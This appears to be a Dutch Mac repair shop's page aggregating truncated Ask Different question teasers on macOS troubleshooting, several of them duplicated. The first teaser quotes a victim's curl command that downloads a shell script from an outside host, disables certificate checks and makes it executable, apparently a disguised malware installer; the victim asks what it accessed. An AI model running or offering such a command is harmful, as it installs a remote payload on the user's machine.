{$lblSkipToContent|ucfirst}

What does this curl command give access to?

maandag 20 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I've run a command that in hindsight, I should have better understood and now want advice on how to understand the impact of my actions. curl -k -o /var/tmp/ffmpeg.sh https://api.drive-release.cloud/ffmpeg-aw.sh && \ chmod +x /var/t…

Lees meer

CMD+C stoped working inside quicklook, I still can copy from the context menu and the menu bar

maandag 20 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

Something broke my quicklook's preview copy shortcut and now when I have a document in preview and select text, hitting cmd+c plays the error sound and the text does not get copied. I can still copy from the right click context menu or …

Lees meer

CMD+C stoped working inside quicklook, I still can copy from the context menu and the menu bar

maandag 20 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

Something broke my quicklook's preview copy shortcut and now when I have a document in preview and select text, hitting cmd+c plays the error sound and the text does not get copied. I can still copy from the right click context menu or …

Lees meer

What does it mean when a software update needs to "send apple events"?

maandag 20 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I've recently upgraded macOS from some 4 year old version of macOS 10 to Sonoma 14.7.2. I then installed a new version of Sublime Text, which frequently asks me to download the latest update. After clicking "download" and then clicking …

Lees meer

How can I have warnings each hour if Time Machine hasn't backed up? [duplicate]

maandag 20 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

IMPORTANT: I want them every hour, like I say in the title, and not every few days randomly, which I say below I already know about. This should not be marked as a duplicate of How do I get Time Machine to Warn when backups haven't happ…

Lees meer

Raid Assistant - setting up Raid One on 2 drives, does it delete the data of both drives?

maandag 20 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

So, I have a 12TB drive. This HDD is formatted in APFS (Case Sensitive). It is a good quality Seagate HDD, less than a month old. It is almost full with data. I have just ordered the exact same model. I want to set them both as Mirrore…

Lees meer

Merging / migrating text replacements from MBP Late-2013 to MBP M4

maandag 20 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I had a large list of 'self-made hotkeys'. I've been trying to understand why only about 10% (quite a randomly selected subset, it seems), was indeed copied to my new machine. I've been directed to ~/Library/Preferences/com.apple.textIn…

Lees meer

Bring Automator app to front at startup

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I have an automator app set to mount a server at startup. On occasion another app gets to the front and prevents the automator app from running. Is there a way of forcing the automator app to the front to stop any other app from blocki…

Lees meer

Force LoDPI (non-retina) apps to run at the real resolution

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

A Mac does a lot of things well, yet gaming might be sometimes a bit finicky, due to developer support. One example is the games on Steam that don't natively support Retina. They start up, and the pixels are just doubled. I am thankful …

Lees meer

Bring Automator app to front at startup

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I have an automator app set to mount a server at startup. On occasion another app gets to the front and prevents the automator app from running. Is there a way of forcing the automator app to the front to stop any other app from blocki…

Lees meer

"App is not open anymore" / "App not responding" intermittent (72 hours) issue opening apps on Mac mini M4 in Sequoia

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I'm experiencing an issue similar to the one Gary describes here: Sometimes, I am not able to launch any apps on my Mac WHAT HAPPENS: Rather frequently (seems to be approximately every 72 hours), my Mac no longer allows me open apps. Ap…

Lees meer

Bring Automator app to front at startup

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I have an automator app set to mount a server at startup. On occasion another app gets to the front and prevents the automator app from running. Is there a way of forcing the automator app to the front to stop any other app from blocki…

Lees meer

"App is not open anymore" / "App not responding" intermittent (72 hours) issue opening apps on Mac mini M4 in Sequoia

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I'm experiencing an issue similar to the one Gary describes here: Sometimes, I am not able to launch any apps on my Mac WHAT HAPPENS: Rather frequently (seems to be approximately every 72 hours), my Mac no longer allows me open apps. Ap…

Lees meer

"App is not open anymore" / "App not responding" intermittent (72 hours) issue opening apps on Mac mini M4 in Sequoia

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I'm experiencing an issue similar to the one Gary describes here: Sometimes, I am not able to launch any apps on my Mac WHAT HAPPENS: Rather frequently (seems to be approximately every 72 hours), my Mac no longer allows me open apps. Ap…

Lees meer

"App is not open anymore" / "App not responding" intermittent (72 hours) issue opening apps on Mac mini M4 in Sequoia

zondag 19 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I'm experiencing an issue similar to the one Gary describes here: Sometimes, I am not able to launch any apps on my Mac WHAT HAPPENS: Rather frequently (seems to be approximately every 72 hours), my Mac no longer allows me open apps. Ap…

Lees meer

Why does lsof -F pc print file descriptors even when not specified?

zaterdag 18 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I'm using the lsof command to list processes using port 53 on macOS. I want to display only the process ID (p) and command name (c) fields, but the output also includes file descriptors (f), even though I only requested -F pc. Here is t…

Lees meer

Why does lsof -F pc print file descriptors even when not specified?

zaterdag 18 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I'm using the lsof command to list processes using port 53 on macOS. I want to display only the process ID (p) and command name (c) fields, but the output also includes file descriptors (f), even though I only requested -F pc. Here is t…

Lees meer

Piping grep With sed

zaterdag 18 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

How do I search and replace strings within all files of folder and subfolder using grep and sed? I'm trying to use this combination, but it keeps giving me an error. grep -rl 'old' *.php | xargs sed -i 's/old/new/g' This is the error I…

Lees meer

/usr/bin/env and command with pound symbol in it

zaterdag 18 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I want to use nix shell in my shebang. The issue is that nix shell uses # symbol as part of flake name and env command on macOS acts a bit weird with this symbol. For example if you will create shebang like this: $ cat ./test #!/usr/bin…

Lees meer

Unable to copy text in Zathura

vrijdag 17 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

I had worked my way through and got Zathura to work on my mac. I was trying to copy text, but i am unable to do so. So naturally, I went to google to fix the problem. I had applied the given setting set selection-clipboard clipboard, bu…

Lees meer

Unable to copy text in Zathura

vrijdag 17 januari 2025 inAsk Different (Tips-Tricks-Tutorials)

So I had worked my way through and got Zathura to work on my mac. I was trying to copy text, but i am unable to do so. So naturally, I went to google to fix the problem. I had applied the given setting set selection-clipboard clipboard,…

Lees meer

Internet - WiFi • e-mail • Software • Hardware • Reparatie • (Geheugen - SSD) Upgrades • Advies • Netwerken • Routers • Beheer op afstand (Teamviewer) • Onderhoud (Online Backup's) • Data Recovery • OSX Server • Synology NAS • Bootcamp - Parallels - VMWare

• 20 jaar ervaring •